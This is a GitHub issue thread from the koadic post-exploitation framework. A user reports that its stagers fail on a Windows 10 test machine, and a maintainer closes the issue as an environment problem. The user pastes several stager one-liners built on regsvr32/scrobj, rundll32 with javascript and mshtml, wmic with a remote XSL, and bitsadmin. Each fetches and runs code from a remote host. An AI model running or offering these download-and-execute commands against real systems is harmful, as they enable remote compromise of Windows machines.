### ISSUE TITLE
stager errors

### ISSUE THREAD

**Issue by cclements** [zerosum0x0/koadic#69]
I'm just starting out with koadic and have to say it's very impressive!  However, I'm having issues with almost all the stagers to the point that I'm /sure/ I must be doing something wrong, but here is the behavior I'm seeing on my test machine by stager (Win10 10.0.17763.55 with windows defender disabled):

regsvr32:

```
regsvr32 /s /u /n /i:http://x.x.x.x:80/PfZR5 scrobj.dll

[3,2] Unexpected tag - expecting the tag 'component' or 'package' : job
```

After, I get no connection.

rundll32:

```
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://x.x.x.x:80/yA0IF",false);x.send();eval(x.responseText);window.close();

Script Error
Line:1
Char: 146
Error: Syntax Error
Code: 0
URL: 
```

After, I get no connection.

rundll32_js

```
wmic os get /FORMAT:"http://x.x.x.x:80/QOlnp.xsl"

ERROR:
Description = Unspecified error
```

After, I get no connection.

mshta

```
bitsadmin /transfer 5sEHv /download /priority high http://x.x.x.x:80/5sEHv.wsf %temp%\5sEHv.wsf & start /wait %temp%\5sEHv.wsf & del %temp%\5sEHv.wsf

DISPLAY: '5sEHv' TYPE: DOWNLOAD STATE: TRANSIENT_ERROR
PRIORITY: HIGH FILES: 0 / 1 BYTES: 0 / 9897 (0%)
ERROR FILE:    http://x.x.x.x:80/5sEHv.wsf -> C:\Users\CCLEME~1\AppData\Local\Temp\5sEHv.wsf
ERROR CODE:    0x8020002e - The connection was closed prematurely.
ERROR CONTEXT: 0x00000005 - The error occurred while the remote file was being processed.
```

After, I get no connection.

Anything I can do to get more diagnostic info?

**Comment by TheNaterz** [comment]
You can try running `verbose true` to turn on more detailed messages, but the problem is that it looks like your target isn't routing to Koadic correctly. You'll have to figure that one out before proceeding.

**Comment by TheNaterz** [comment]
Chalking this one up to environment issues that are not related to Koadic. If you still see problems, post another issue!
